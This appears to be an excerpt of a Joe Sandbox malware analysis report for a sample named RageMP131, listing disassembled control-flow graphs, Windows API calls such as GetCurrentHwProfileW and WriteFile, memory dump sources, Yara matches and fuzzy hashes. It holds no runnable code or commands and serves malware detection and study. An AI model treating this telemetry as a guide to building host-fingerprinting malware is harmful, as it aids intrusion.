                                    control_flow_graph 922 54c0aa9-54c0c10 940 54c0c22-54c0c34 GetCurrentHwProfileW 922->940 942 54c0c39-54c0d61 call 54c0d64 940->942 956 54c0daf-54c0e08 call 54c0e04 942->956 957 54c0d63 942->957 962 54c0e68-54c0e6e 956->962 963 54c0e0a-54c0e56 956->963 965 54c0e6f-54c0ea3 call 54c0ea7 962->965 963->965 972 54c0eaa-54c0eaf 965->972 973 54c0ea5-54c0ea9 965->973 974 54c0ec5-54c0f06 972->974 975 54c0f0c-54c0f13 973->975 976 54c0eab-54c0eaf 973->976 977 54c0f14-54c0f9d 974->977 975->977 976->974
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 7acbdb17128002f1ae3675f4e93a7e9fcd70a9e2bb3554e718df2b06ffd3970d
                                    • Instruction ID: 05bcb342c8257d428d187ab71f77463d0e2b289f360816e854b0136ca9d06a31
                                    • Opcode Fuzzy Hash: 7acbdb17128002f1ae3675f4e93a7e9fcd70a9e2bb3554e718df2b06ffd3970d
                                    • Instruction Fuzzy Hash: 2A41AEEF14C125FCB292C5816B5CAFE6A6FE6D6730B3084ABF40FD6542E2D40E8A5131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 990 a22f0c-a22f2e 991 a23121 990->991 992 a22f34-a22f36 990->992 993 a23123-a23127 991->993 994 a22f62-a22f85 992->994 995 a22f38-a22f57 call a12193 992->995 997 a22f87-a22f89 994->997 998 a22f8b-a22f91 994->998 1003 a22f5a-a22f5d 995->1003 997->998 999 a22f93-a22fa4 997->999 998->995 998->999 1001 a22fa6-a22fb4 call a1bbed 999->1001 1002 a22fb7-a22fc7 call a22a51 999->1002 1001->1002 1008 a23010-a23022 1002->1008 1009 a22fc9-a22fcf 1002->1009 1003->993 1010 a23024-a2302a 1008->1010 1011 a23079-a23099 WriteFile 1008->1011 1012 a22fd1-a22fd4 1009->1012 1013 a22ff8-a2300e call a22622 1009->1013 1017 a23065-a23077 call a22ace 1010->1017 1018 a2302c-a2302f 1010->1018 1014 a230a4 1011->1014 1015 a2309b-a230a1 1011->1015 1019 a22fd6-a22fd9 1012->1019 1020 a22fdf-a22fee call a229e9 1012->1020 1029 a22ff1-a22ff3 1013->1029 1022 a230a7-a230b2 1014->1022 1015->1014 1041 a2304c-a2304f 1017->1041 1023 a23051-a23063 call a22c92 1018->1023 1024 a23031-a23034 1018->1024 1019->1020 1025 a230b9-a230bc 1019->1025 1020->1029 1030 a230b4-a230b7 1022->1030 1031 a2311c-a2311f 1022->1031 1023->1041 1032 a2303a-a23047 call a22ba9 1024->1032 1033 a230bf-a230c1 1024->1033 1025->1033 1029->1022 1030->1025 1031->993 1032->1041 1038 a230c3-a230c8 1033->1038 1039 a230ef-a230fb 1033->1039 1042 a230e1-a230ea call a1ac78 1038->1042 1043 a230ca-a230dc 1038->1043 1044 a23105-a23117 1039->1044 1045 a230fd-a23103 1039->1045 1041->1029 1042->1003 1043->1003 1044->1003 1045->991 1045->1044
                                    APIs
                                    • WriteFile.KERNELBASE(?,00000000,00A16AF7,?,00000000,00000000,00000000,?,00000000,?,00A0C023,00A16AF7,00000000,00A0C023,?,?), ref: 00A23091
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite
                                    • String ID:
                                    • API String ID: 3934441357-0
                                    • Opcode ID: 49ade1233ee523d3ca919ff7c79963846a05ad079eedafebf579a731e69af8ca
                                    • Instruction ID: 44e90fb5f422791ee536e9221006804d34bb9d09290ea7f9ff65e62d7f8e8f21
                                    • Opcode Fuzzy Hash: 49ade1233ee523d3ca919ff7c79963846a05ad079eedafebf579a731e69af8ca
                                    • Instruction Fuzzy Hash: C561D472D04129BFDF11DFACE984AEEBBB9AF19304F140165E904AB252C375DA11CB60
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 59698ce45b9148c84281877dbe14c702f882c1246ce1b73abdf315fa29894bae
                                    • Instruction ID: 9b9b7e19b5e03e742ee00bf9ae42131acf3bdeae1ae054a00f3424d595e890d0
                                    • Opcode Fuzzy Hash: 59698ce45b9148c84281877dbe14c702f882c1246ce1b73abdf315fa29894bae
                                    • Instruction Fuzzy Hash: 06318BEF14C125BCB292C1856B5CAFE6B6EE6D6730B3084ABF40FD6542E2D41A8A5131
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 7611faf0d8627107d93d1b8468ea1fb3a3ef8e644972e1b893895260cc955f35
                                    • Instruction ID: 0b04cddfa2f4665d162c1556d1d3a597a1fc5b83cf2bbbf65527002d21db67ca
                                    • Opcode Fuzzy Hash: 7611faf0d8627107d93d1b8468ea1fb3a3ef8e644972e1b893895260cc955f35
                                    • Instruction Fuzzy Hash: 7531BFEF14C125BDB292C1816B5CAFA6B7FE6D6730B3084ABF40FD6542E2D41A8A5131
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 34116dc137c4c477342c18f22ecd7b960d3928070e41c5a36c6514e85be1698d
                                    • Instruction ID: 5e50f8f08e8594c6ee2474cc5e84ef48909e1e978df42c307c752e57636ea6fa
                                    • Opcode Fuzzy Hash: 34116dc137c4c477342c18f22ecd7b960d3928070e41c5a36c6514e85be1698d
                                    • Instruction Fuzzy Hash: AE31AEEF14C114BDB296C5816B5CAFE6FBEE6D6330B3084ABF40FD6542E2D44A8A5131
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: b6c736b22573864721bdecbfbc0cbc55bfdee46ac3533f0585e64cb3a62f48fa
                                    • Instruction ID: 73bcb04635738b538f858590b05104668fde30283455af90f0300d0003eedb0d
                                    • Opcode Fuzzy Hash: b6c736b22573864721bdecbfbc0cbc55bfdee46ac3533f0585e64cb3a62f48fa
                                    • Instruction Fuzzy Hash: 9231AFEF14C114BDA296C5816B5CAFA6FBFE6D6730B3084ABF40FD6542E2D40A8E5131
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: df1add8b210246102c79577a27794e3d37c66f7cac2284b4bed06b8e1167f43e
                                    • Instruction ID: 726d8dffbf8fee62ae35c93c65e7067a20e8c0af0e8807489c70478cba11e6a0
                                    • Opcode Fuzzy Hash: df1add8b210246102c79577a27794e3d37c66f7cac2284b4bed06b8e1167f43e
                                    • Instruction Fuzzy Hash: 7A31C4EF14C124ADA296C1556B5D6FA6FBEE5D733073084ABF40FC6946E2840A4E5131
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0099BB71
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task
                                    • String ID:
                                    • API String ID: 118556049-0
                                    • Opcode ID: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
                                    • Instruction ID: a2e340e8a8a69aa119e09e7f986a4709c44c9c12696ae56d18b1f52d3f170153
                                    • Opcode Fuzzy Hash: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
                                    • Instruction Fuzzy Hash: 204113729001099BCF15DF6CEA816AEBBE9EF44350F240669F804EB345D734EE109BE1
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 839b904950cc7a7a92e78b2c893dfcacc4bd58895b48c2f3ee0fd415bb6421f5
                                    • Instruction ID: 538736e6c51d0a9b26e2a57b88d8974f23b06d3b00094a25adc0bcecf345d574
                                    • Opcode Fuzzy Hash: 839b904950cc7a7a92e78b2c893dfcacc4bd58895b48c2f3ee0fd415bb6421f5
                                    • Instruction Fuzzy Hash: 3621EDEF14C124BCB296C6856B1CAFEAFBFE6D733033085ABB40FD5546E2841A4A5131
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: a87617a5874b0a6687939e654d264cd24f41a239f5c8784898273278b22d28ca
                                    • Instruction ID: f049bd3ad80d8dd13b4bfaf0a9d9f49ac5341de8abe424bb9776a9285bbbfac2
                                    • Opcode Fuzzy Hash: a87617a5874b0a6687939e654d264cd24f41a239f5c8784898273278b22d28ca
                                    • Instruction Fuzzy Hash: 2F21ACEF14C124FCA196C6856B1CAFE6EBFE6D733073085ABB40FD5641E2941A8A5131
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 3d213a3073017e3b298a99b2dbaaa37a48a764a236b908fd24095733619e7d05
                                    • Instruction ID: e8ae35eeefe853e4974a6ec25e644fe8c029beb565a8d1e4674776d02e8ac3d6
                                    • Opcode Fuzzy Hash: 3d213a3073017e3b298a99b2dbaaa37a48a764a236b908fd24095733619e7d05
                                    • Instruction Fuzzy Hash: 332101EF10C224BDA282D2546B586FA6FBEE6D6330B3085ABB40FD6642D2910A4A4171
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 08b9b9932ec6094e1cdd26559dac50aa62965f1dfe5e304a613bb3f3d7521727
                                    • Instruction ID: 743151f9e3fb6cfad8b65ae24c51cbe3d276e44e7e475faf9d858a412dccd9d9
                                    • Opcode Fuzzy Hash: 08b9b9932ec6094e1cdd26559dac50aa62965f1dfe5e304a613bb3f3d7521727
                                    • Instruction Fuzzy Hash: 8B11D0EF10C124BCB1C6D2456B5CAFA6BBEE6D733033081AFB40FC5945D2810A8A5171
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00A22469,00000000,CF830579,00A61148,0000000C,00A22525,00A1662D,?), ref: 00A225D8
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeCloseFindNotification
                                    • String ID:
                                    • API String ID: 2591292051-0
                                    • Opcode ID: e41bddfd3ad5c7327bbe2fcd51eb33e0674a20c71563727b360244ddb98ee7b7
                                    • Instruction ID: dbb60b60da5bdc7e199c7ee74018b0b8254eaaae61a471aa343a2ca086a61cc7
                                    • Opcode Fuzzy Hash: e41bddfd3ad5c7327bbe2fcd51eb33e0674a20c71563727b360244ddb98ee7b7
                                    • Instruction Fuzzy Hash: 4011483360513426C62463BC7E5977E275A8B92B30F254239FC088B1C2DE7DD8828381
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00A60E00,00A0C023,00000002,00A0C023,00000000,?,?,?,00A1BBD6,00000000,?,00A0C023,00000002,00A60E00), ref: 00A1BB08
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: 1b808ba50bb86b51f809141ff6fc29d4e238aa5f67acb6726c6c06daf347689b
                                    • Instruction ID: d0e94ad34f38f776c0dc3ee5c9de0a1fcd8f0afad17afe8d8919d149cd9342c6
                                    • Opcode Fuzzy Hash: 1b808ba50bb86b51f809141ff6fc29d4e238aa5f67acb6726c6c06daf347689b
                                    • Instruction Fuzzy Hash: 2A0126326241586FCF09DF5ACC45CEE3B29EF81370B240208F8019B2D0EB71ED9187A0
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00931FDE
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID:
                                    • API String ID: 2659868963-0
                                    • Opcode ID: b8f40caa4f1287907beefea8ca75fbb169b46d95453cf35e0fb1ecf872d8a719
                                    • Instruction ID: 7ae4b1cefa00fbafbc4b986ca6691264a6788130c874e9f00b253c23656013a1
                                    • Opcode Fuzzy Hash: b8f40caa4f1287907beefea8ca75fbb169b46d95453cf35e0fb1ecf872d8a719
                                    • Instruction Fuzzy Hash: F201D63551030DBBCB14ABA8FC019897BACDE01360B508636F914AB591FBB0E99087A1
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,00A0B16C,?,?,00A237E9,00000001,00000364,?,00000006,000000FF,?,00A0E0EB,?,?,?,?), ref: 00A23EA5
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: a2c4f1c1fe5324af3bb33d6831e211f3803161533072772d16a1df13747c3dbb
                                    • Instruction ID: ce81eeea2c0c566e3c5723c7bf038c247e4dc11d1c6d24f235cb4322a98a00f7
                                    • Opcode Fuzzy Hash: a2c4f1c1fe5324af3bb33d6831e211f3803161533072772d16a1df13747c3dbb
                                    • Instruction Fuzzy Hash: FCF08933505535669F326B7A6905BAB77DBBF43760B174131FC0896180DB74EE0886E1
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00A0E0EB,?,?,?,?,?,00932D8D,00A0B16C,?,?,00A0B16C), ref: 00A248CF
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true
                                    • Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 60d5849dc19cf9f4a58a4427c7915bd2793b8f8df9d0fa4e6cbd5ca2995901d9
                                    • Instruction ID: 2a2334a6ce5425cbecb4ef6a79c1a7fd8d8e88c26243a7a074b2587e9da8ad03
                                    • Opcode Fuzzy Hash: 60d5849dc19cf9f4a58a4427c7915bd2793b8f8df9d0fa4e6cbd5ca2995901d9
